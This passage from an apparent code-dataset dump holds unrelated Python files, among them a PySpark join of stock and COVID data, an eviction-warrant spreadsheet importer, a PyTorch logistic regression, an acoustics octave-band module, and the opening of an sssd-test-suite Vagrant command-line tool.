took {} s\".format(book, str(time.time() - s) ))\n return Response(headers=headers)\n\n\nif __name__ == \"__main__\":\n\tapp.run(host=\"0.0.0.0\")\n\n","sub_path":"pub-server/pub-server.py","file_name":"pub-server.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"438486321","text":"from Framework.screen.Navigation import move_to_reports, move_to_overview\nfrom Framework.utility.Constants import get_XPATH, get_projectLogger\nfrom Framework.utility.SeleniumWebScraper import SWS\n\n\n# Project constants\nlogger = get_projectLogger()\nXPATH = get_XPATH()\n\n\ndef read_all_new_reports(sws: SWS):\n \"\"\"\n Reads all new reports, does not store them.\n\n Parameters:\n - sws (SWS): Selenium Web Scraper.\n\n Returns:\n - True if operation was successful, False otherwise.\n \"\"\"\n ret = False\n UNREAD_REPORT_TEXT = '(unread)'\n if move_to_reports(sws):\n while sws.isVisible(XPATH.STRING_ON_SCREEN % UNREAD_REPORT_TEXT):\n if sws.clickElement(f\"{XPATH.STRING_ON_SCREEN % UNREAD_REPORT_TEXT}/*\", refresh=True):\n if not move_to_reports(sws, forced=True):\n logger.error('In read_all_new_reports: move_to_reports() failed')\n break\n else:\n logger.error('In read_all_new_reports: Failed to open report')\n break\n else:\n ret = True\n else:\n logger.error('In read_all_new_reports: move_to_reports() failed')\n # Return to Overview\n if move_to_overview(sws) and ret:\n logger.success('In read_all_new_reports: All new reports were read')\n else:\n ret = False\n logger.error('In read_all_new_reports: move_to_overview() failed')\n return ret\n","sub_path":"Framework/screen/Reports.py","file_name":"Reports.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"11850464","text":"from __future__ import print_function\n\nimport sys\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.functions import col, unix_timestamp, to_date, rank, sum, max, min\nfrom pyspark.sql.window import Window\n\nif __name__ == \"__main__\":\n\n spark = SparkSession.builder.appName('sp500_agg_join').getOrCreate()\n\n # reading in the data\n stock_data = spark.read.format('csv') \\\n .options(header='true', inferschema='false') \\\n .load(sys.argv[1])\n stock_data = stock_data.withColumn('Date', to_date(unix_timestamp(col('Date'), 'yyyy-MM-dd').cast('timestamp')))\n stock_data = stock_data.toDF('Date',\n 'Symbol',\n 'Name',\n 'Close_Change',\n 'Close_LogChange',\n 'Close',\n 'Adj Close',\n 'High',\n 'Low',\n 'Open',\n 'Volume')\n\n max_date = stock_data.agg(max('Date')).collect()[0][0]\n min_date = stock_data.agg(min('Date')).collect()[0][0]\n\n stock_cumulative_data = spark.read.format('csv') \\\n .options(header='true', inferschema='false') \\\n .load(sys.argv[2])\n stock_cumulative_data = stock_cumulative_data.withColumn('Date', to_date(unix_timestamp(col('Date'), 'yyyy-MM-dd').cast('timestamp')))\n stock_cumulative_data = stock_cumulative_data.select('Symbol',\n 'Date',\n 'CumulativeSum')\n stock_cumulative_data = stock_cumulative_data.toDF('Symbol',\n 'Date',\n 'Close_LogChangeCumulative')\n\n\n oxford_data = spark.read.format('csv') \\\n .options(header='true', inferschema='false') \\\n .load(sys.argv[3]) \n oxford_data = oxford_data.withColumn('Date', to_date(unix_timestamp(col('Date'), 'yyyy-MM-dd').cast('timestamp')))\n oxford_data = oxford_data.filter((col('Date') <= max_date) & (col('Date') >= min_date))\n oxford_data = 
oxford_data.toDF('Date',\n 'USA_StringencyIndex',\n 'USA_StringencyIndex_LogChange',\n 'USA_StringencyIndex_LogChangeCumulative',\n 'USA_StringencyLegacyIndex',\n 'USA_StringencyLegacyIndex_LogChange',\n 'USA_StringencyLegacyIndex_LogChangeCumulative',\n 'USA_GovernmentResponseIndex',\n 'USA_GovernmentResponseIndex_LogChange',\n 'USA_GovernmentResponseIndex_LogChangeCumulative',\n 'USA_ContainmentHealthIndex',\n 'USA_ContainmentHealthIndex_LogChange',\n 'USA_ContainmentHealthIndex_LogChangeCumulative',\n 'USA_EconomicSupportIndex',\n 'USA_EconomicSupportIndex_LogChange',\n 'USA_EconomicSupportIndex_LogChangeCumulative')\n\n john_hopkins_USA_data = spark.read.format('csv') \\\n .options(header='true', inferschema='false') \\\n .load(sys.argv[4]) \n john_hopkins_USA_data = john_hopkins_USA_data.withColumn('Date', to_date(unix_timestamp(col('Date'), 'yyyy-MM-dd').cast('timestamp')))\n john_hopkins_USA_data = john_hopkins_USA_data.filter((col('Date') <= max_date) & (col('Date') >= min_date))\n john_hopkins_USA_data = john_hopkins_USA_data.select('Date',\n 'Confirmed Cases',\n 'Cases Increase',\n 'Deaths',\n 'Deaths Increase')\n john_hopkins_USA_data = john_hopkins_USA_data.toDF('Date',\n 'USA Covid Confirmed Cases',\n 'USA Covid Cases LogChange',\n 'USA Covid Deaths',\n 'USA Covid Deaths LogChange')\n\n john_hopkins_world_data = spark.read.format('csv') \\\n .options(header='true', inferschema='false') \\\n .load(sys.argv[5]) \n john_hopkins_world_data = john_hopkins_world_data.withColumn('Date', to_date(unix_timestamp(col('Date'), 'yyyy-MM-dd').cast('timestamp')))\n john_hopkins_world_data = john_hopkins_world_data.filter((col('Date') <= max_date) & (col('Date') >= min_date))\n john_hopkins_world_data = john_hopkins_world_data.select('Date',\n 'Confirmed Cases',\n 'Cases Increase',\n 'Deaths',\n 'Deaths Increase')\n john_hopkins_world_data = john_hopkins_world_data.toDF('Date',\n 'World Covid Confirmed Cases',\n 'World Covid Cases LogChange',\n 'World Covid Deaths',\n 'World Covid Deaths LogChange')\n\n news_data = spark.read.format('csv') \\\n .options(header='true', inferschema='false') \\\n .load(sys.argv[6]) \n news_data = news_data.withColumn('date', to_date(unix_timestamp(col('date'), 'yyyy-MM-dd').cast('timestamp')))\n news_data = news_data.filter((col('date') <= max_date) & (col('date') >= min_date))\n news_data = news_data.toDF('Date',\n 'News title--source')\n\n\n # John Hopkins cumulative increase calculations\n cum_window = Window.orderBy(john_hopkins_USA_data['Date']).rangeBetween(Window.unboundedPreceding, 0)\n john_hopkins_USA_data = john_hopkins_USA_data.withColumn('USA Covid Cases LogChangeCumulative', sum('USA Covid Cases LogChange').over(cum_window))\n john_hopkins_USA_data = john_hopkins_USA_data.withColumn('USA Covid Deaths LogChangeCumulative', sum('USA Covid Deaths LogChange').over(cum_window))\n john_hopkins_USA_data = john_hopkins_USA_data.select('Date',\n 'USA Covid Confirmed Cases',\n 'USA Covid Cases LogChange',\n 'USA Covid Cases LogChangeCumulative',\n 'USA Covid Deaths',\n 'USA Covid Deaths LogChange',\n 'USA Covid Deaths LogChangeCumulative')\n\n cum_window = Window.orderBy(john_hopkins_world_data['Date']).rangeBetween(Window.unboundedPreceding, 0)\n john_hopkins_world_data = john_hopkins_world_data.withColumn('World Covid Cases LogChangeCumulative', sum('World Covid Cases LogChange').over(cum_window))\n john_hopkins_world_data = john_hopkins_world_data.withColumn('World Covid Deaths LogChangeCumulative', sum('World Covid Deaths LogChange').over(cum_window))\n 
john_hopkins_world_data = john_hopkins_world_data.select('Date',\n                                                              'World Covid Confirmed Cases',\n                                                              'World Covid Cases LogChange',\n                                                              'World Covid Cases LogChangeCumulative',\n                                                              'World Covid Deaths',\n                                                              'World Covid Deaths LogChange',\n                                                              'World Covid Deaths LogChangeCumulative')\n\n    # joining all the data\n    joined_data = stock_data.join(stock_cumulative_data, on=['Date', 'Symbol'], how='inner')\n    joined_data = joined_data.select('Date',\n                                     'Symbol',\n                                     'Name',\n                                     'Close_Change',\n                                     'Close_LogChange',\n                                     'Close_LogChangeCumulative',\n                                     'Close',\n                                     'Adj Close',\n                                     'High',\n                                     'Low',\n                                     'Open',\n                                     'Volume')\n    \n    joined_data = joined_data.join(john_hopkins_USA_data, on=['Date'], how='outer') # outer\n\n    joined_data = joined_data.join(john_hopkins_world_data, on=['Date'], how='outer') # outer\n    \n    joined_data = joined_data.join(oxford_data, on=['Date'], how='outer') # outer\n\n    joined_data = joined_data.join(news_data, on=['Date'], how='outer') # outer\n\n    joined_data = joined_data.orderBy(col('Date'), col('Symbol')) \n\n    # writing out all the data\n    header = [tuple(joined_data.columns)]\n    header = spark.createDataFrame(header)\n    joined_data = header.union(joined_data)\n    joined_data.write.options(emptyValue='').csv('S&P_500_Aggregate_Join_Oxford_JohnHopkins_News.out')\n\n    spark.stop()","sub_path":"spark/Joined Data/S&P_500_aggregate/join.py","file_name":"join.py","file_ext":"py","file_size_in_byte":9696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"28568751","text":"import json\nimport sys\n\nimport nltk\n\ndef main(repeat_times=3, include_tagging=False, sentence=None):\n    nltk.download('punkt')\n    nltk.download('averaged_perceptron_tagger')\n    if not sentence:\n        sentence = \"\"\"At eight o'clock on Thursday morning Arthur didn't feel very good.\"\"\"\n    tokens = nltk.word_tokenize(sentence)\n    for n in range(repeat_times):\n        print(f\"repeat time: {n}\")\n        print(tokens)\n        if include_tagging:\n            print(\"Including Tokens\")\n            tagged = nltk.pos_tag(tokens)\n            print(tagged[0:6])\n    return \"Done\"\n\nif __name__ == \"__main__\":\n    # We will get either json list of args, a json map of kwargs, both or neither.\n    args, kwargs = [], {}\n    if len(sys.argv) > 1:\n        argvs = [json.loads(w) for w in sys.argv[1:]]\n        args = [w for w in argvs if isinstance(w, list)]\n        kwargs = [w for w in argvs if isinstance(w, dict)]\n        if len(args) > 1 or len(kwargs) > 1 or len(sys.argv) > 3:\n            raise ValueError(\"Only one json list (args) and/or one json map (kwargs) allowed.\")\n    args = [] if not args else args[0]\n    kwargs = {} if not kwargs else kwargs[0]\n    main(*args, **kwargs)\n","sub_path":"main_with_reqs.py","file_name":"main_with_reqs.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"427906965","text":"from .models import db\nfrom .models import Attorney, Courtroom, Defendant, DetainerWarrant, District, Judge, Plaintiff, detainer_warrant_defendants\nfrom .util import get_or_create, normalize, open_workbook, dw_rows, district_defaults\nfrom sqlalchemy.exc import IntegrityError, InternalError\nfrom sqlalchemy.dialects.postgresql import insert\nfrom decimal import Decimal\n\nDOCKET_ID = 'Docket #'\nFILE_DATE = 'File_date'\nSTATUS = 'Status'\nPLAINTIFF = 'Plaintiff'\nPLTF_ATTORNEY = 'Plaintiff_atty'\nCOURT_DATE = 'Court_date'\nRECURRING_COURT_DATE = 'Any_day'\nCOURTROOM = 'Courtroom'\nJUDGE = 'Presiding_judge'\nAMT_CLAIMED = 'Amount_claimed_num'\nAMT_CLAIMED_CAT = 'Amount_claimed_cat'\nIS_CARES = 
'CARES'\nIS_LEGACY = 'LEGACY'\nNONPAYMENT = 'Nonpayment'\nADDRESS = 'Address'\nNOTES = 'Notes'\n\n\ndef normalize(value):\n if type(value) is int:\n return value\n elif type(value) is str:\n no_trailing = value.strip()\n return no_trailing if no_trailing not in ['', 'NA'] else None\n else:\n return None\n\n\ndef create_defendant(defaults, number, warrant):\n prefix = f'Def_{number}_'\n first_name = warrant[prefix + 'first']\n middle_name = warrant[prefix + 'middle']\n last_name = warrant[prefix + 'last']\n suffix = warrant[prefix + 'suffix']\n phones = warrant[prefix + 'phone']\n address = warrant[ADDRESS]\n\n defendant = None\n if bool(first_name) or bool(phones):\n defendant, _ = get_or_create(\n db.session, Defendant,\n first_name=first_name,\n middle_name=middle_name,\n last_name=last_name,\n suffix=suffix,\n potential_phones=phones, address=address, defaults=defaults\n )\n return defendant\n\n\ndef link_defendant(docket_id, defendant):\n db.session.execute(insert(detainer_warrant_defendants)\n .values(detainer_warrant_docket_id=docket_id, defendant_id=defendant.id))\n\n\ndef _from_workbook_row(raw_warrant, defaults):\n warrant = {k: normalize(v) for k, v in raw_warrant.items()}\n\n docket_id = warrant[DOCKET_ID]\n file_date = warrant[FILE_DATE]\n status = warrant[STATUS]\n\n attorney = None\n if warrant[PLTF_ATTORNEY]:\n attorney, _ = get_or_create(\n db.session, Attorney, name=warrant[PLTF_ATTORNEY], defaults=defaults)\n\n plaintiff = None\n if warrant[PLAINTIFF]:\n plaintiff, _ = get_or_create(\n db.session, Plaintiff, name=warrant[PLAINTIFF], defaults=defaults)\n\n court_date = warrant[COURT_DATE]\n recurring_court_date = warrant[RECURRING_COURT_DATE]\n\n courtroom = None\n if warrant[COURTROOM]:\n courtroom, _ = get_or_create(\n db.session, Courtroom, name=warrant[COURTROOM], defaults=defaults)\n\n presiding_judge = None\n if warrant[JUDGE]:\n presiding_judge, _ = get_or_create(\n db.session, Judge, name=warrant[JUDGE], defaults=defaults)\n\n amount_claimed = Decimal(str(warrant[AMT_CLAIMED]).replace(\n '$', '').replace(',', '')) if warrant[AMT_CLAIMED] else None\n amount_claimed_category = warrant[AMT_CLAIMED_CAT] or 'N/A'\n is_cares = warrant[IS_CARES] == 'Yes' if warrant[IS_CARES] else None\n is_legacy = warrant[IS_LEGACY] == 'Yes' if warrant[IS_LEGACY] else None\n nonpayment = warrant[NONPAYMENT] == 'Yes' if warrant[NONPAYMENT] else None\n\n defendant = create_defendant(defaults, 1, warrant)\n defendant2 = create_defendant(defaults, 2, warrant)\n defendant3 = create_defendant(defaults, 3, warrant)\n\n notes = warrant[NOTES]\n\n dw_values = dict(docket_id=docket_id,\n file_date=file_date,\n status_id=DetainerWarrant.statuses[status],\n plaintiff_id=plaintiff.id if plaintiff else None,\n plaintiff_attorney_id=attorney.id if attorney else None,\n court_date='11/3/2020' if court_date == '11/3' else court_date,\n court_date_recurring_id=DetainerWarrant.recurring_court_dates[\n recurring_court_date.upper()] if recurring_court_date else None,\n courtroom_id=courtroom.id if courtroom else None,\n presiding_judge_id=presiding_judge.id if presiding_judge else None,\n amount_claimed=amount_claimed,\n amount_claimed_category_id=DetainerWarrant.amount_claimed_categories[\n amount_claimed_category.upper()],\n is_cares=is_cares,\n is_legacy=is_legacy,\n nonpayment=nonpayment,\n notes=notes,\n last_edited_by_id=-1\n )\n\n insert_stmt = insert(DetainerWarrant).values(\n **dw_values\n )\n\n do_update_stmt = insert_stmt.on_conflict_do_update(\n constraint=DetainerWarrant.__table__.primary_key,\n 
set_=dw_values\n )\n\n db.session.execute(do_update_stmt)\n db.session.commit()\n\n try:\n if defendant:\n link_defendant(docket_id, defendant)\n if defendant2:\n link_defendant(docket_id, defendant2)\n if defendant3:\n link_defendant(docket_id, defendant3)\n\n except IntegrityError:\n pass\n\n db.session.commit()\n\n\ndef from_workbook_help(warrants):\n defaults = district_defaults()\n\n for warrant in warrants:\n _from_workbook_row(warrant, defaults)\n\n\ndef from_workbook(workbook_name, limit=None, service_account_key=None):\n wb = open_workbook(workbook_name, service_account_key)\n\n warrants = dw_rows(limit, wb)\n\n from_workbook_help(warrants)\n","sub_path":"eviction_tracker/detainer_warrants/imports.py","file_name":"imports.py","file_ext":"py","file_size_in_byte":5576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"114131929","text":"\n\nfrom xai.brain.wordbase.nouns._platter import _PLATTER\n\n#calss header\nclass _PLATTERS(_PLATTER, ):\n\tdef __init__(self,): \n\t\t_PLATTER.__init__(self)\n\t\tself.name = \"PLATTERS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"platter\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_platters.py","file_name":"_platters.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"617514062","text":"from AcikHack import TextRank1, Summarize_Finder\r\nfrom AcikHack.Keyword_Search.summa import keywords\r\nfrom googletrans import Translator\r\n\r\n\r\ndef Key_words(text):\r\n tr4w = TextRank1.TextRank4Keyword()\r\n tr4w.analyze(text, candidate_pos=['NOUN', 'PROPN'], window_size=4, lower=False)\r\n q = tr4w.get_keywords(10)\r\n t = []\r\n q1 = []\r\n for word in keywords.keywords(text):\r\n if word != '\\n':\r\n t.append(word)\r\n else:\r\n q1.append(''.join(t))\r\n t = []\r\n print(q)\r\n print(q1)\r\n translator = Translator(service_urls=[\r\n 'translate.google.com'\r\n ])\r\n qTR = []\r\n q1TR = []\r\n trans = []\r\n for word in q:\r\n translations = translator.translate([word], dest='tr')\r\n for translation in translations:\r\n trans.append(translation.text)\r\n trans = ''.join(trans)\r\n qTR.append(trans)\r\n trans = []\r\n\r\n for word in q1:\r\n translations = translator.translate([word], dest='tr')\r\n for translation in translations:\r\n trans.append(translation.text)\r\n trans = ''.join(trans)\r\n q1TR.append(trans)\r\n trans = []\r\n\r\n print(qTR)\r\n print(q1TR)\r\n\r\n Summarize_Finder.Find_Summarize(text, qTR, q1TR) #degistircez turkce koy\r\n","sub_path":"AcikHack/Keywords_Finder.py","file_name":"Keywords_Finder.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"402638113","text":"import torch\nfrom torch.autograd import Variable\nimport torchvision.transforms as transforms\nimport torchvision.datasets as dsets\nimport numpy as np\n\nfrom torch.optim.optimizer import Optimizer, required\nimport torch.nn.functional as F\nimport time\n\n\nhhh = {}\nclass SGD(Optimizer):\n def __init__(self, params, lr=required, momentum=0, dampening=0,\n weight_decay=0, nesterov=False):\n if lr is not required and lr < 0.0:\n raise ValueError(\"Invalid learning rate: {}\".format(lr))\n defaults = dict(lr=lr)\n super(SGD, self).__init__(params, defaults)\n\n def __setstate__(self, state):\n super(SGD, self).__setstate__(state)\n\n def zero_grad(self):\n for group in self.param_groups:\n for p in 
group['params']:\n if p.grad is not None:\n #print(\"grad: \"+str(type(p.grad))+' p: '+str(type(p)))\n #print(\"data: \" + str(type(p.data))+' grad data: '+str(type(p.grad.data)))\n p.grad.detach_()\n p.grad.zero_()\n p.data = hhh[p]\n\n def step(self, closure=None):\n loss = None\n if closure is not None:\n loss = closure()\n for group in self.param_groups:\n for p in group['params']:\n if p.grad is None:\n continue\n d_p = p.grad.data\n #print(p.data)\n\n #p.data = torch.from_numpy(np.ones_like(p.data.numpy()))\n new_data = p.data.clone().detach()\n new_data.add_(-group['lr'], d_p)\n hhh[p]=new_data\n #p.data.add_(-group['lr'], d_p)\n #print(p.data)\n\n return loss\n\nbatch_size = 100\nn_iters = 3000\ninput_dim = 784\noutput_dim = 10\nlr_rate = 0.001\n\ntrain_dataset = dsets.MNIST(root='./data', train=True, transform=transforms.ToTensor(), download=True)\ntest_dataset = dsets.MNIST(root='./data', train=False, transform=transforms.ToTensor())\n\ntrain_loader = torch.utils.data.DataLoader(dataset=train_dataset, batch_size=batch_size, shuffle=True)\ntest_loader = torch.utils.data.DataLoader(dataset=test_dataset, batch_size=batch_size, shuffle=False)\n\nepochs = n_iters / (len(train_dataset) / batch_size)\n\n\nclass LogisticRegression(torch.nn.Module):\n def __init__(self, input_dim, output_dim):\n super(LogisticRegression, self).__init__()\n self.linear = torch.nn.Linear(input_dim, output_dim)\n\n def forward(self, x):\n #outputs = F.softmax(self.linear(x), dim = 1)\n outputs = self.linear(x)\n return outputs\n\n\n#model = torch.jit.script(LogisticRegression(input_dim, output_dim))\nmodel = LogisticRegression(input_dim, output_dim)\n#torch.jit.save(model,'lr.ndl')\n#model = torch.jit.load('lr.ndl')\ncriterion = torch.nn.CrossEntropyLoss() # computes softmax and then the cross entropy\n#criterion = torch.jit.script(torch.nn.CrossEntropyLoss()) # computes softmax and then the cross entropy\n\noptimizer = torch.optim.Adam(model.parameters(), lr=lr_rate)\n\nfor param in model.parameters():\n print(param.size())\nfor name, param in model.named_parameters():\n print(name)\n print(param.size())\n\niter_num = 0\nstart_time = time.time()\nb = 0\nfor epoch in range(int(epochs)):\n for i, (images, labels) in enumerate(train_loader):\n images = Variable(images.view(-1, 28 * 28))\n labels = Variable(labels)\n\n optimizer.zero_grad()\n a = time.time()\n outputs = model(images)\n loss = criterion(outputs, labels)\n loss.backward()\n b += time.time() - a\n optimizer.step()\n\n iter_num+=1\n if iter_num%500==0:\n # calculate Accuracy\n print(time.time() - start_time)\n print('model: ',b)\n start_time = time.time()\n correct = 0\n total = 0\n for images, labels in test_loader:\n images = Variable(images.view(-1, 28*28))\n outputs = model(images)\n tmp, predicted = torch.max(outputs.data, 1)\n print(tmp,predicted)\n total+= labels.size(0)\n # for gpu, bring the predicted and labels back to cpu fro python operations to work\n correct+= (predicted == labels).sum()\n accuracy = 100 * correct/total\n print(\"Iteration: {}. Loss: {}. 
Accuracy: {}.\".format(iter_num, loss.item(), accuracy))\n","sub_path":"lr.py","file_name":"lr.py","file_ext":"py","file_size_in_byte":4433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"311553699","text":"\"\"\"\nBands\n=====\n\n\n\n\"\"\"\n\n\nfrom __future__ import division\n\nimport numpy as np\n\nfrom acoustics.utils import esum\n\nOCTAVE_CENTER_FREQUENCIES = np.array([16, 31.5, 63, 125, 250, 500,\n 1000, 2000, 4000, 8000, 16000])\n\"\"\"\nPreferred 1/1-octave band center frequencies.\n\"\"\"\n\nTHIRD_OCTAVE_CENTER_FREQUENCIES = np.array([12.5, 16, 20, 25, 31.5, 40,\n 50, 63, 80, 100, 125, 160,\n 200, 250, 315, 400, 500, 630,\n 800, 1000, 1250, 1600, 2000, 2500,\n 3150, 4000, 5000, 6300, 8000, 10000,\n 12500, 16000, 20000])\n\"\"\"\nPreferred 1/3-octave band center frequencies.\n\"\"\"\n\n\ndef octave(first, last):\n \"\"\"\n Generate a Numpy array for central frequencies of octave bands.\n\n There are more information on how to calculate 'real' bands in\n http://blog.prosig.com/2006/02/17/standard-octave-bands/\n\n Parameters\n ----------\n first : scalar\n First octave centerfrequency.\n\n last : scalar\n Last octave centerfrequency.\n\n Returns\n -------\n octave_bands : array\n An array of centerfrequency octave bands.\n \"\"\"\n octave_bands = OCTAVE_CENTER_FREQUENCIES\n low = np.where(octave_bands == first)[0]\n high = np.where(octave_bands == last)[0]\n return octave_bands[low: high+1]\n\n\ndef octave_low(first, last):\n return octave(first, last)/np.sqrt(2.0)\n\n\ndef octave_high(first, last):\n return octave(first, last)*np.sqrt(2.0)\n\n\ndef third(first, last):\n \"\"\"\n Generate a Numpy array for central frequencies of third octave bands.\n\n Parameters\n ----------\n first : scalar\n First third octave centerfrequency.\n\n last : scalar\n Last third octave centerfrequency.\n\n Returns\n -------\n octave_bands : array\n An array of centerfrequency third octave bands.\n \"\"\"\n third_oct_bands = THIRD_OCTAVE_CENTER_FREQUENCIES\n low = np.where(third_oct_bands == first)[0]\n high = np.where(third_oct_bands == last)[0]\n return third_oct_bands[low: high+1]\n\n\ndef third_low(first, last):\n return third(first, last)/2.0**(1.0/6.0)\n\n\ndef third_high(first, last):\n return third(first, last)*2.0**(1.0/6.0)\n\n \ndef third2oct(levels, axis=None):\n \"\"\"\n Calculate Octave levels from third octave levels.\n \n :param levels: Array containing third octave levels.\n :type: :class:`np.ndarray`\n :param axis: Axis over which to perform the summation. \n :type axis: :class:`int`\n \n :returns: Third octave levels\n :rtype: :class:`np.ndarray`\n \n .. 
\ndef _check_band_type(freqs):\n \"\"\"Check if an array contains octave or third octave bands values sorted\n or unsorted.\n \"\"\"\n octave_bands = octave(16, 16000)\n third_oct_bands = third(12.5, 20000)\n\n def _check_sort(freqs, bands):\n index = np.where(np.in1d(bands, freqs))[0]\n band_pos = index - index[0]\n if (band_pos == np.arange(band_pos.size)).all():\n sorted = True\n else:\n sorted = False\n return sorted\n\n if np.in1d(freqs, octave_bands).all() == True:\n is_sorted = _check_sort(freqs, octave_bands)\n if is_sorted is True:\n band_type = 'octave'\n else:\n band_type = 'octave-unsorted'\n elif np.in1d(freqs, third_oct_bands).all() == True:\n is_sorted = _check_sort(freqs, third_oct_bands)\n if is_sorted is True:\n band_type = 'third'\n else:\n band_type = 'third-unsorted'\n else:\n band_type = None\n\n return band_type\n","sub_path":"acoustics/bands.py","file_name":"bands.py","file_ext":"py","file_size_in_byte":4134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"397663964","text":"# Chapter 17 - Multivariate Statistics\nimport numpy as np\n\nv = np.array([1, 2, 3, 4, 5, 6])\n\nprint(v)\n\nresult = np.mean(v)\nprint(result)\n\nM = np.array([\n [1, 2, 3, 4, 5, 6],\n [1, 2, 3, 4, 5, 6]\n\n])\n\ncol_mean = np.mean(M, axis=0)\nprint(col_mean)\n\nrow_mean = np.mean(M, axis=1)\nprint(row_mean)\n\n# variance\n\nv = np.array([1, 2, 3, 4, 5, 6])\n\nresult = np.var(v, ddof=1)\nprint(result)\n\nM = np.array([\n [1, 2, 3, 4, 5, 6],\n [1, 2, 3, 4, 5, 6]])\nprint(M)\n# column standard deviations\ncol_std = np.std(M, ddof=1, axis=0)\nprint(col_std)\n# row standard deviations\nrow_std = np.std(M, ddof=1, axis=1)\nprint(row_std)\n\n#covariance\n\nx = np.array([1,2,3,4,5,6,7,8,9])\nprint(x)\n\ny = np.array([9,8,7,6,5,4,3,2,1])\nprint(y)\n\nSigma = np.cov(x,y)[0,1]\nprint(Sigma)\n\n\ncorr = np.corrcoef(x,y)[0,1]\nprint(corr)\n\n\n# covariance matrix\nfrom numpy import array\nfrom numpy import cov\n# define matrix of observations\nX = array([\n[1, 5, 8],\n[3, 5, 11],\n[2, 4, 9],\n[3, 6, 10],\n[1, 5, 10]])\nprint(X)\n# calculate covariance matrix\nSigma = cov(X.T)\nprint(Sigma)\n\n","sub_path":"ch17/ch17.py","file_name":"ch17.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"521451874","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n#\n# Authors:\n# Pavel Březina \n#\n# Copyright (C) 2019 Red Hat\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n#\n\nimport os\nimport re\nimport sys\nimport shutil\nimport hashlib\nimport argparse\nimport datetime\nimport textwrap\nimport subprocess\n\nfrom utils import *\n\nif len(sys.argv) >= 2 and sys.argv[1] != 'provision-host':\n from vagrant_cloud import *\n\n\nclass Command:\n def __init__(self, subparser, name, help):\n self.dir = os.path.dirname(os.path.realpath(__file__)) + '/..'\n self.pool = '%s/pool' % self.dir\n self.shell = Shell(self.dir)\n self.vagrant = Vagrant(self.dir)\n self.ansible = Ansible(self.dir)\n self.linux = ['ipa', 'ldap', 'client']\n self.windows = ['ad', 'ad-child']\n self.guests = self.windows + self.linux\n\n self.name = name\n self.parser = subparser.add_parser(name, help=help, description=help)\n self.parser.set_defaults(func=self.run)\n\n def run(self, args, params=[]):\n raise NotImplementedError()\n\n\nclass BasicVagrantCommand(Command):\n def __init__(self, subparser, name, help, command=None):\n super().__init__(subparser, name, help)\n\n self.command = [self.name] if command is None else command\n\n self.parser.add_argument(\n '--all', action='store_const', dest='guests',\n const=self.guests, help='Run command on all machines (default)'\n )\n\n self.parser.add_argument(\n '--ad', action=UniqueAppendConstAction, dest='guests',\n const='ad', help='Run command on AD machine'\n )\n\n self.parser.add_argument(\n '--ad-child', action=UniqueAppendConstAction, dest='guests',\n const='ad-child', help='Run command on AD child machine'\n )\n\n self.parser.add_argument(\n '--ipa', action=UniqueAppendConstAction, dest='guests',\n const='ipa', help='Run command on IPA machine'\n )\n\n self.parser.add_argument(\n '--ldap', action=UniqueAppendConstAction, dest='guests',\n const='ldap', help='Run command on LDAP machine'\n )\n\n self.parser.add_argument(\n '--client', action='append_const', dest='guests',\n const='client', help='Run command on client machine'\n )\n\n self.parser.add_argument(\n '-s', '--sequence', action='store_true', dest='sequence',\n help='Run operation on guests in sequence (one by one)'\n )\n\n def run(self, args, params=[]):\n runon = []\n\n if args.guests is None:\n args.guests = self.guests\n\n for guest in args.guests:\n runon.append(guest)\n\n if args.sequence:\n for guest in runon:\n self.vagrant.run(self.command + [guest], params)\n return\n\n self.vagrant.run(self.command + runon, params)\n\n\nclass SSHVagrantCommand(Command):\n def __init__(self, subparser, name, help):\n super().__init__(subparser, name, help)\n\n self.parser.add_argument(\n 'guest',\n type=str,\n choices=self.linux\n )\n\n def run(self, args, params=[]):\n self.vagrant.run([self.name] + [args.guest], params)\n\n\nclass RDPVagrantCommand(Command):\n def __init__(self, subparser, name, help):\n super().__init__(subparser, name, help)\n\n self.parser.add_argument(\n 'guest',\n type=str,\n choices=self.windows\n )\n\n def run(self, args, params=[]):\n self.vagrant.run([self.name] + [args.guest], params)\n\n\nclass ProvisionHostCommand(Command):\n def __init__(self, subparser, name, help):\n super().__init__(subparser, name, help)\n\n self.parser.add_argument(\n '-p', '--pool', action='store', type=str, dest='pool',\n help='Location of libvirt storage pool that '\n 'will be named as \"sssd-test-suite\"',\n required=True\n )\n\n def run(self, args, params=[]):\n if not self.installAnsible():\n print(\"Please, 
